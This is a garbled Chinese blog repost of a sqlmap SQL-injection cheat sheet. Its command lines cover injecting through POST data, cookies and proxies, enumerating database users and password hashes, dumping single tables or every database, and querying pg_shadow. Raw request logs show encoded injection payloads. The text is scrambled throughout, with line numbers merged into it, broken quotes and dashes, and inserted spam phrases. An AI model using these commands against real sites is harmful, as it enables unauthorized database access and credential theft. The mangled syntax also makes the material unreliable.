注入常用语句 t users sinp 4 web server operating system: linux ubuntu 8.10 (intrepid ibex) dbms: postgresql : users id blissettnameisnull bunnyming 这个东西，是mickey整理的，不多说了，尊重一下原作者，转载注明mickey整理就好了 21 22 更新 23
注入常用语句
t users sinp> 4web server operating system: linux ubuntu 8.10 (intrepid ibex) dbms: postgresql : users id blissettnameisnull bunnyming这个东西，是mickey整理的，不多说了，香港服务器，尊重一下原作者，转载注明mickey整理就好了 21 22 更新 23 svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-devm=1″ -v 1 –sql-shell //执行sql语句m更详细的信息options from a configuration ini file 30 sqlmap -c sqlmap.conf 31 32 使用post方法提交sqlmap/oracle/post_int.php” –method post –data “id=1″使用cookies方式提交,cookie的值用;分割,可以使用tamperdata来抓cookiessqlmap使用referer欺骗sqlmap使用自定义user-agent,或者使用随机使用自带的user-agents.txtsqlmapagent “mozillapython sqlmap.py sqlmapa “.agents.txt” 46 47 使用基本认证sqlmap使用digest认证sqlmap使用代理,配合torsqlmap.1.47:3128″sqlmap.1.47:8118″ 56 57 使用多线程猜解sqlmap–threads 绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入sqlmapp “idsqlmapcatp “cat,id”sqlmapagent” –.7rc1 (http://sqlmap.sourceforge.net)” 64 65 指定数据库,绕过sqlmap的自动检测sqlmap/pgsql/get_int.php?id=1″ -v 2 –dbms “postgresql” mysql 69 * oracle 70 * postgresql 71 * microsoft sql server 72 73 指定操作系统,绕过sqlmap自动检测sqlmap/pgsql/get_int.php?id=1″ -v 2 –os “windows” linux 77 * windows 78 79 自定义payload 80 options: –prefix and –postfixcircumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the sql injection by directly providing a injection payload prefix and/or postfix.users . “‘) limit 0, 1″;:.″ test” 87 88 [...] 89 [hh:mm:16] [info] testing sql injection on get parameter ‘id’ with 0 parenthesis 90 [hh:mm:16] [info] testing custom injection on get parameter ‘id’ 91 [hh:mm:16] [traffic out] http request: 92 get /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20and%207433=7433%20and%20 93 %28%27test%27=%27test http/1.1 94 accept-charset: iso-8859-15,utf-8;q=0.7,*;q=0.7 95 host: 192.168.1.121:80 96 accept-language: en-us,en;q=0.5 97 accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, 98 image/png,*/*;q=0.5 99 user-agent: sqlmap/0.7rc1 ()100 connection: close101 [...]102 [hh:mm:17] [info] get parameter ‘id’ is custom injectable103 [...]104 105 as you can see, the injection payload for testing for custom injection is:106 107 id=1%27%29%20and%207433=7433%20and%20%28%27test%27=%27test108 109 which url decoded is:testmakes the query syntatically correct to the page query:users (‘test’='test’) limit 0, 1116 117 in this simple example, sqlmap could detect the sql injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it.118 119 页面比较120 python sqlmap.py -u “?id=1″ –string “luther” -v 1121 python sqlmap.py -u “?id=1″ –regexp “
lu[\w][\w]er” -v122 123 排除网站的内容124 python sqlmap.py -u “?id=1″ –excl-reg “dynamic content: ([\d]+)”125 126 多语句测试，php内嵌函数mysql_query(),不支持多语句127 python sqlmap.py -u “?id=1″ –stacked-test -v 1128 129 union注入测试130 python sqlmap.py -u “?id=1″ –union-test -v 1131 132 unionz注入配合orderby133 python sqlmap.py -u “?id=1″ –union-test –union-tech orderby -v 1134 135 python sqlmap.py -u “?id=1″ -v 1 –union-use –banner136 python sqlmap.py -u “?id=1″ -v 5 –union-use –current-user137 python sqlmap.py -u “?id=1″ -v 1 –union-use –dbs138 139 fingerprint140 python sqlmap.py -u “?id=1″ -v 1 -f141 python sqlmap.py -u “?name=luther” -v 1 -f -b142 143 判断当前用户是否是dba144 python sqlmap.py -u “?id=1″ –is-dba -v 1145 146 列举数据库用户147 python sqlmap.py -u “?id=1″ –users -v 0148 149 列举数据库用户密码150 python sqlmap.py -u “?id=1″ –passwords -v 0151 python sqlmap.py -u “?id=1″ –passwords -u sa -v 0152 153 查看用户权限154 python sqlmap.py -u “?id=1″ –privileges -v 0155 python sqlmap.py -u “?id=1″ –privileges -u postgres -v 0156 157 列数据库158 python sqlmap.py -u “?id=1″ –dbs -v 0159 160 列出指定数据库指定表的列名161 python sqlmap.py -u “?id=1″ –columns -t users -d test -v 1162 163 列出指定数据库的指定表的指定列的内容164 python sqlmap.py -u “?id=1″ –dump -t users -d master -c surname -v 0165 166 指定列的范围从2－4167 python sqlmap.py -u “?id=1″ –dump -t users -d test –start 2 –stop 4 -v 0168 169 导出所有数据库，所有表的内容170 python sqlmap.py -u “?id=1″ –dump-all -v 0171 172 只列出用户自己新建的数据库和表的内容173 python sqlmap.py -u “?id=1″ –dump-all –exclude-sysdbs -v 0174 175 sql query176 python sqlmap.py -u “?id=1″ –sql-query “select usename from pg_user” -v 0177 python sqlmap.py -u “?id=1″ –sql-query “select host, password from mysql.user limit 1, 3″ -v 1178 179 select usename, passwd from pg_shadow order by usename180 181 保存和恢复会话182 python sqlmap.py -u “?id=1″ -b -v 1 -s “sqlmap.log”183 184 保存选项到inc配置文件185 python sqlmap.py -u “?id=1″ -b -v 1 –save=====================================================2、sqlmap -g 关键词“ //这是通过google搜索注入，现在还不可以，不知道是什么原因，网站空间，可以直接修改为百度 194 3、 195 python sqlmap.py -u http://192.168.1.47/page.php?id=1&cat=2 -v 1 [hh:mm:25] [info] testing if the url is stable, wait a few seconds 199 [hh:mm:26] [info] url is stable id' is dynamic id' is dynamic id' is dynamic id' 204 [hh:mm:26] [info] testing numeric/unescaped injection on get parameter [hh:mm:26] [info] confirming numeric/unescaped injection on get idid' is numeric/unescaped injectable 209 [hh:mm:26] [info] testing mysql ) 211 [hh:mm:26] [info] retrieved: 55 212 [hh:mm:26] [info] performed 20 queries in 0 seconds 213 [hh:mm:26] [info] confirming mysql ) 215 [hh:mm:26] [info] retrieved: 1 216 [hh:mm:26] [info] performed 13 queries in 0 seconds 217 [hh:mm:26] [info] query: select 5 from information_schema.tables limit 218 0, 1 219 [hh:mm:26] [info] retrieved: 5 220 [hh:mm:26] [info] performed 13 queries in 0 seconds 221 remote dbms: mysql >= 5.0.0 4、指定参数注入 python sqlmap.py -u http://192.168.1.47/page.php?id=1&cat=2 -v 1 228 -p id [hh:mm:17] [info] testing if the url is stable, wait a few seconds 232 [hh:mm:18] [info] url is stable id' 234 [hh:mm:18] [info] testing numeric/unescaped injection on parameter [hh:mm:18] [info] confirming numeric/unescaped injection on idid' is numeric/unescaped injectable 239 [...] or if you want to provide more than one parameter, for instance: $ python sqlmap.py -u http://192.168.1.47/page.php?id=1&cat=2 -v 246 1 -p cat,id 5、指定方法和post的数据 250 python sqlmap.py -u http://192.168.1.47/page.php --method post -- 251 data id=1&cat=2 6、指定cookie,可以注入一些需要登录的地址 255 python sqlmap.py -u http://192.168.1.47/page.php?id=1&cat=2 --cookie 256 cookie_value 7、通过代理注入 260 python sqlmap.py -u http://192.168.1.47/page.php?id=1&cat=2 --proxy 261 http://127.0.0.1:8118 262 8、指定关键词，香港服务器，也可以不指定。程序会根据返回结果的hash自动判断 263 python sqlmap.py -u http://192.168.1.47/page.php?id=1&cat=2 --string 264 string_on_true_page 265 9、指定数据，这样就不用猜测其他的数据库里。可以提高效率。 266 --remote-dbms 267 10、指纹判别数据库类型 268 python sqlmap.py -u http://192.168.1.47/page.php?id=1&cat=2 -v 1 -f 269 11、获取banner信息 270 python sqlmap.py -u http://192.168.1.47/page.php?id=1&cat=2 -b . 
posted on